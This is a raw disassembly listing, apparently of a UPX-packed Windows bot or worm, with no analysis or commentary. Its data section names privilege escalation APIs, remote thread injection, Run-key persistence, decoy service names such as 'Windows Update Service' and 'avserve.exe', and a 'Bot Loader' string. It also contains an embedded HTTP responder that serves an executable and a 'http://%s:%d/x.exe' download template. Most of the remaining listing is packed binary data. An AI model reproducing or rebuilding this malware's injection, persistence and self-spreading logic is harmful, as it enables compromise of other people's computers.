dword_31424A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31424A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31421801+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31424BBE dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_31421801+41B�o
; sub_31421801+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_31424C70: ; DATA XREF: sub_31421801+44A�o
jmp short loc_31424C78
; ---------------------------------------------------------------------------
jmp short loc_31424C7A
; ---------------------------------------------------------------------------
align 8
loc_31424C78: ; CODE XREF: UPX0:loc_31424C70�j
; DATA XREF: sub_31421801+5C�o
pop esp
pop esp
loc_31424C7A: ; CODE XREF: UPX0:31424C72�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31424C84 dd 1CEC8166h dword_31424C88 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2A�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31421D68+8�o
; sub_314223B2+12C�o
align 10h
aUterm192 db 'uterm19-2',0 ; DATA XREF: sub_31421DF0:loc_31421ED5�o
; UPX0:31422351�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31421DF0+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37�o
align 10h
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31421DF0+34�o
align 10h
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31421DF0+18�o
align 4
dword_31424D3C dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 4
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85�o
db 0Dh,0Ah,0
align 10h
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 10h
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 10h
aU192x db 'u19-2x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 10h
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 10h
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 10h
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 10h
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 10h
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 4
aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
align 4
dd 2 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 10h
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 4
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 10h
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 6 dup(0)
dword_31424FE8 dd 0 ; sub_314221C4+80�w
dword_31424FEC dd 0 ; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 70h ; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; sub_314223B2+CE�w
dword_31424FFC dd 0 ; sub_31422712+20�r
dword_31425000 dd 31420000h ; UPX0:31422341�w
dword_31425004 dd 0 ; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0DC000201h
dd 40DD34h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D30h, 50788B34h, 0A0F44D89h
dd 8D7031B4h, 1BDBD84Bh, 0CD5285D8h, 1F0F552h, 0EC7047D2h
dd 0EC1265F1h, 0D790ED74h, 9ABD1110h, 0E82636Ch, 5D231409h
dd 0F11BE164h, 5051F84Dh, 68971818h, 8B1B1528h, 5DB0892Ah
dd 58D1B040h, 6B03CA3Ah, 5E30EB34h, 193B5BB5h, 0F05559ABh
dd 52EA037Dh, 45E626B7h, 3151F03Eh, 3DC25350h, 0AC1ED9F1h
dd 0D6BDF435h, 3C4FFAFAh, 0D06A1778h, 3BEC5577h, 5F0574C7h
dd 589B56B9h, 8CBF1BEBh, 0B9CD2534h, 0E5985CDh, 7EB05FCh
dd 0A1EF7408h, 5817D487h, 51515FFCh, 6468512Fh, 310F60B8h
dd 0D00D5C69h, 252C8836h, 0B1AFDDB8h, 0AEBAC44Ch, 0FECB213h
dd 71C22D59h, 0F9EBA67Bh, 3CBCB66Ah, 35500C80h, 0A82C49DDh
dd 2C507D50h, 91165DC0h, 2019852Eh, 0A971437Ch, 8B577F16h
dd 0D214247Ch, 0FD177E11h, 8760CFFFh, 61C2801Ah, 461E1488h
dd 0E97CF73Bh, 3B2480h, 593575B6h, 448B548Ch, 65A5F2Eh
dd 0ACF19D0Ch, 66DB5657h, 0BB622F21h, 0DC73074Bh, 501950F0h
dd 4D000056h, 0ACAA25B8h, 0DBC49577h, 4DF0E3DAh, 0FA6849F4h
dd 65FFF00Ch, 0C7A326DAh, 0CC343408h, 7B666B2Ah, 754C2EB2h
dd 0BC500A0Ah, 0E84F8520h, 54181A5Ch, 7FB807C6h, 5F6B7C3Bh
dd 40740180h, 1008B0Ch, 448D5108h, 0B166D824h, 30215F73h
dd 5903D311h, 4D3E13BAh, 0CC150724h, 0C82007BBh, 1D0CF1FEh
dd 0C8E4332Fh, 10E7C1F8h, 0D9919E6Ch, 0B60B85h, 915D8B02h
dd 12351C09h, 4001F333h, 0C2C03AB2h, 0CFC653C4h, 0E3676D5Eh
dd 5035F211h, 0B4B06825h, 831C0135h, 33ADE748h, 0B5ECF203h
dd 9541F017h, 7568CC35h, 3D986866h, 6C58B7A3h, 0F0446EC6h
dd 58FE474Fh, 0B31A54Dh, 0DA141B37h, 0EEBF0354h, 34007C74h
dd 0B933A1h, 0BAEDDB79h, 3BC72B7Fh, 8B0272C1h, 292BE1C1h
dd 318E8A1h, 0BF8923C7h, 0CCACDCA5h, 1172233Dh, 0A36786Ah
dd 40F868CFh, 0E113C4EBh, 5B3D9350h, 0D411778Ch, 5815941Eh
dd 68C9BB93h, 68030B40h, 6759973Ch, 3A3CB36Dh, 52535453h
dd 8FA311F8h, 9824D083h, 4DB04C2h, 30232C66h, 0B1F70E64h
dd 60B0C0B5h, 4EE808D0h, 3A95D0DDh, 6806C8EEh, 1D898068h
dd 0EEDB6897h, 7E182784h, 0D4C014ECh, 0DB3000F2h, 539153DAh
dd 3A01027Bh, 4D26B51Ah, 0FD7780EBh, 39ACD28Dh, 2F741A4Dh
dd 1D59DECDh, 0CA3DC9Eh, 0B6FEA365h, 0A49784C6h, 565153FCh
dd 37D83A86h, 6874B623h, 5EF92656h, 0FBE369Ah, 10C25819h
dd 56C05E05h, 8499A5E9h, 89E80C4Bh, 0D80DEC5Dh, 53BFB7Dh
dd 1FFF25FFh, 0A3C33A04h, 0E77443FCh, 37FA126Fh, 84CC8A1Fh
dd 50DF74C9h, 6E42EA6Bh, 5F57C661h, 6465A540h, 0AFA6B0Ch
dd 5F7B4499h, 1FD814F8h, 0E8FEB3ABh, 7E689E48h, 624E1520h
dd 7B385097h, 0CF53E2EBh, 9043455Fh, 3059875Eh, 3CAE7001h
dd 36D0F433h, 11D6B0EBh, 0D6E6023Eh, 0C1E6C342h, 68B4803Ah
dd 63A3ABB4h, 0BE608AC0h, 7B7C74E0h, 76336182h, 0E4FBF4A3h
dd 4552B73Dh, 767BB37Dh, 640D29E0h, 1BE21904h, 23B26863h
dd 9C170D13h, 0EB13EC13h, 7EC6AC86h, 99AE13EDh, 44F83569h
dd 0E4093970h, 8F401824h, 4DC3390h, 8C64D24Bh, 0EF609045h
dd 391C8E06h, 98589472h, 0A0489C50h, 2391C840h, 0A838A447h
dd 1C28AC30h, 0B0E47239h, 0B81CB420h, 9114BC18h, 0C08E4723h
dd 0C80CC410h, 0F3E47208h, 0D000CCC8h, 0F8D44DFCh, 8E6DF4D8h
dd 0F0DC391Ch, 0E8E4ECE0h, 6CD7E068h, 3704C011h, 0DEA36CD3h
dd 0ADB72F1Bh, 8C02FCB0h, 12730983h, 6EDD8C34h, 85414B80h
dd 594A8D90h, 0E8EB0CFFh, 9C8709B1h, 5CB40D1Ah, 7E0F991Ah
dd 748739A1h, 4DD86839h, 989DA8ABh, 4D373D8Ch, 0F6DC806h
dd 0DD26121h, 4659AC0h, 5BB3B724h, 1521C46Bh, 16A20A34h
dd 0E41173E3h, 2842276Eh, 0D21E5F9Ah, 0B414AE87h, 1388F818h
dd 24E3EB9Ch, 99093C28h, 95AF5A15h, 247031B6h, 0A4806355h
dd 1F0AAD7Fh, 8A51AD01h, 6A9E0B45h, 0EC380C1Eh, 52DB32FFh
dd 3831CC3Ah, 108FE35Dh, 8825DCDFh, 7D20B5Dh, 35B70FFDh
dd 80CF5A0Ch, 0F59A93Fh, 3FEF799h, 0C3FE8ED6h, 0FC65B2EDh
dd 72FFFB80h, 62BA5EBDh, 3B265F76h, 6F045981h, 0A0586833h
dd 4F43856Dh, 40A8108h, 9DB59B0Ch, 8F0B090Dh, 9B49275h
dd 0F758076h, 2C255FF9h, 0D9DADE41h, 84323D89h, 0E7D703FFh
dd 43EB50DBh, 9623FB81h, 5D875F9Fh, 13B166BAh, 5A737B4Fh
dd 73C196A2h, 2FE665h, 0DBE78B79h, 0FF04FD73h, 7F3CF6FEh
dd 0C6C5B688h, 0F50F339Fh, 0F33B088Bh, 3B27AADCh, 0A33E1D8Bh
dd 2F9E57A0h, 2259ED57h, 0F8D69C60h, 56E21359h, 0FFC390E2h
dd 0EE75B3BBh, 5E1AC8ECh, 271068F2h, 0D3BED3A6h, 1C18099Eh
dd 2D70843Ch, 2AD650A9h, 454E6105h, 32F8FC2h, 5C6A2BA6h
dd 9DCDF2AAh, 3A4C5E0Fh, 6E030BFCh, 0B0AB60C0h, 103B4E35h
dd 0BC025E11h, 42BA275Bh, 80C6096Ch, 0FAE17616h, 6F39DF0Bh
dd 57935655h, 57B1019h, 13E6D884h, 8F0D0CC3h, 1F0CA551h
dd 0B120DDFDh, 1462F489h, 0BF66153h, 340B7F02h, 38506ADBh
dd 52C5D08h, 740096D2h, 0B5E8F1AEh, 1110918h, 3BB00510h
dd 141960E1h, 6D84F00h, 103B0E17h, 0BDAAA27Eh, 0D5530D74h
dd 203C51C7h, 11106844h, 18244C39h, 37D0DB0Eh, 0ED85ED3Ah
dd 4BA5117Eh, 834D2C26h, 14DB0EEDh, 0A20596EFh, 750DF2EBh
dd 24B7160Eh, 0FADDEB65h, 2C193F68h, 1B33D170h, 46CE0C96h
dd 0A915182Ch, 0E974106Eh, 1408FA10h, 18D9512Fh, 165B1B56h
dd 1837FC72h, 3D563EF6h, 0B8C6239h, 412ADC74h, 0C0B6E965h
dd 2050D361h, 6C5F1810h, 3089381h, 550F5EAAh, 344AEB8Bh
dd 33E1C68Bh, 32C562Eh, 5359D932h, 27005556h, 108B59CBh
dd 0C520A25h, 724C5904h, 0AF5D0C20h, 0E418713Ch, 0DE530128h
dd 7EDE4E21h, 8E6956E2h
dd 1E3C3494h, 794E365Ch, 0D8875F7h, 1D140487h, 0B2582D28h
dd 7AA4BBC5h, 0D85A3568h, 3D9A045Eh, 203B10F4h, 813DDF06h
dd 7D221DCFh, 1E748D47h, 983F7B01h, 56FCCF40h, 0FF1C1E48h
dd 0DEA5E417h, 4545E0B5h, 521F0FFFh, 36666C38h, 46506008h
dd 0E6740E1Ch, 89BD766Ah, 36A93CB7h, 0D68681B2h, 4FB0B657h
dd 8E47069Ch, 84D4391Ch, 70DC78D8h, 0C8E464E0h, 4CE42391h
dd 24EC40E8h, 72398326h, 4F414F0h, 9C4C84B7h, 0BF0B9A2Fh
dd 8AF9BE64h, 7E2C742Ch, 0C43D188Bh, 34597B06h, 177572B4h
dd 0D354490Eh, 91DC113h, 48833E2Ah, 0A3C9A891h, 88E075BDh
dd 0C1361188h, 9746A78h, 317674B4h, 8859FE8Bh, 0BCDE636Ah
dd 0F82FA184h, 83227027h, 0C08303E0h, 51705705h, 59CD45E9h
dd 230DCAFDh, 1210CFD7h, 0BDCCC33Dh, 26D60713h, 9D3F140Eh
dd 0E887B305h, 40A26150h, 0E84D096Fh, 0C63F4120h, 99598B36h
dd 41D986D7h, 60D9F424h, 1F4541Bh, 61E812B8h, 8BE007BAh
dd 22E7D89Fh, 1FC517D0h, 0A600C748h, 5914310Dh, 21BA1025h
dd 0B3BFBF08h, 501D6AE0h, 71DCBFh, 0A03F514Fh, 7403D583h
dd 0BB0A3137h, 615FD8A0h, 52D1BEA7h, 8B37F453h, 0BC3D660Dh
dd 0B1383D53h, 0EE6BDB3Ah, 0CE590FEBh, 368B632h, 1B0C165Bh
dd 16C965E2h, 0C2268DDCh, 3141CC68h, 683A464Eh, 0B9BB66E7h
dd 12971A0Dh, 66AF495Eh, 4A4C12C1h, 0DE1219EEh, 0BBC631D8h
dd 162CFD3Bh, 0B596C823h, 0A3480710h, 0CF216C5h, 0CD6015EBh
dd 1CA65709h, 5D511910h, 43D5F07Dh, 5044330Ch, 856A7D68h
dd 138B67BEh, 0CC4011h, 0F23306FFh, 5284CDCh, 0F0F410F8h
dd 3DF52351h, 9B51001Bh, 0FBF63F8Dh, 14723BBEh, 2D0BE981h
dd 17018504h, 0C82BEC73h, 0D5A0568Bh, 8B0CC4B7h, 0EA088BE1h
dd 0C6C653A3h, 6443B646h, 4958055Ch, 0A8A04500h, 51E600C0h
dd 6F18054h, 0E296EF02h, 53522497h, 8F803141h, 8DF50101h
dd 0FFFF1183h, 5279FFFFh, 3AE42AECh, 9B49E7F6h, 0AFBEE0EAh
dd 447EDB21h, 615E1A95h, 1F85A032h, 0FF949F6Ah, 43FF3994h
dd 0A684FFFFh, 0CE358F26h, 0C9A55C1Dh, 657AB20Bh, 4D373072h
dd 6C697A6Fh, 0FF6B616Ch, 342FFFFFh, 2820302Eh, 706D6F63h
dd 62697461h, 203B656Ch, 4549534Dh, 9153620h, 7FFFBA81h
dd 646E6957h, 2073776Fh, 3520544Eh, 3429312Eh, 0BE798EE4h
dd 0D4007767h, 0B4C40104h, 0E790A00Eh, 80E7BEFBh, 0E680474h
dd 9B480958h, 3C9E79ECh, 4530D474h, 0E7C82220h, 4A1026F9h
dd 40F80030h, 6FFDB6B7h, 76766313h, 7E75722Eh, 65070077h
dd 0C6DFEF64h, 65976CB6h, 65C1660Fh, 72616573h, 370E6863h
dd 1F6FFE57h, 6F626F72h, 61686378h, 1FD2676Eh, 7C8D7465h
dd 720C6FFBh, 69622E64h, 2861007Ah, 616B6863h, 0BB17376Dh
dd 6740CB0h, 24782Dh, 0B76F6C06h, 0E6DB66Dh, 476B3762h
dd 7A027626h, 0DFB1852Eh, 1B7674DEh, 706F7411h, 69176E2Eh
dd 10ADB00Fh, 332773B0h, 6F0F788Dh, 611FE176h, 746C7564h
dd 694B652Dh, 0E1338072h, 6FDB6EDBh, 4E73A66Eh, 67622E74h
dd 6B67694Fh, 32580FBFh, 61777800h, 62626A2Ch, 0F676DFADh
dd 7A9B006Fh, 0A8616661h, 23655D2Eh, 10FFFE5Ch, 6261AF09h
dd 66656463h, 6A696867h, 6E6D6C6Bh, 0DDBF0A1Bh, 0F77271C5h
dd 78777675h, 43650E79h, 0F8DFED44h, 474645FFh, 4B4A4948h
dd 4F4E4D4Ch, 54545150h, 58575655h, 71B5A59h, 23187FF6h
dd 70747468h, 252F2F3Ah, 0DF2F0B73h, 65737E16h, 68702E97h
dd 3D0E3F70h, 6373260Fh, 0CF6FED6Eh, 2664066Fh, 76666E69h
dd 39313D3Bh, 1526322Dh, 0B948EC1Eh, 0EBA21D74h, 32313D58h
dd 7F7D9137h, 3101A8D7h, 3030383Ah, 0DFDF652Fh, 1FFFFB00h
dd 5DDFE8B0h, 0B966C933h, 758D01EEh, 8AFE8B05h, 7993C06h
dd 6DFFFD06h, 302C0646h, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 0FEFFDB7Eh, 6765DF85h, 9993712Eh, 0FD1201C9h, 16FD91BDh
dd 0FEEBC107h, 6872FFFDh, 66FD42AAh, 0BA10FDAAh, 98A91C14h
dd 98F3C91Ah, 28608F1h, 763FF67Fh, 9010C071h, 9237CB5Fh
dd 781C9659h, 57E4143Ah, 7DB77D71h, 3A0A61F2h, 9DF34571h
dd 98904F1h, 0DF73A47Fh, 119C04F1h, 0F367B340h, 1C10F0E3h
dd 0B1DDBDFEh, 59B20BDCh, 25C99B60h, 414D901h, 0B1F2C8A1h
dd 71CA17C7h, 688D2B9Eh, 0ADAD9161h, 1AC2F67Dh, 111D96E2h
dd 0C850B228h, 0FDBB9900h, 0DC14EDB3h, 12255557h, 91C0A44Eh
dd 0ED994912h, 9FBB54F7h, 1400DBFDh, 0CBCA3AC4h, 0FF1C3B71h
dd 1A21E424h, 6D93CDCFh, 8FCDB0F6h, 3F812C66h, 76CDF31Eh
dd 0B8B0FBFFh, 12CDC383h, 0CBC9A85Dh, 99AD251Dh, 24B64FECh
dd 0A6485A0Bh, 1B14C096h, 3FD9767Eh, 0EBA7294Ch, 0E9BA9CF3h
dd 26F43416h, 3FFEEE71h, 0EFCF5FBh, 0EF133BF9h, 376B4629h
dd 4766DE5Fh, 0ECA0A8ECh, 16CDFFFDh, 0FFC5B701h, 0E9ECE9EDh
dd 0E1FCB7FDh, 7FB7012Ch, 0F5CA21F7h, 0F25AFCFCh, 0FCF7EBFCh
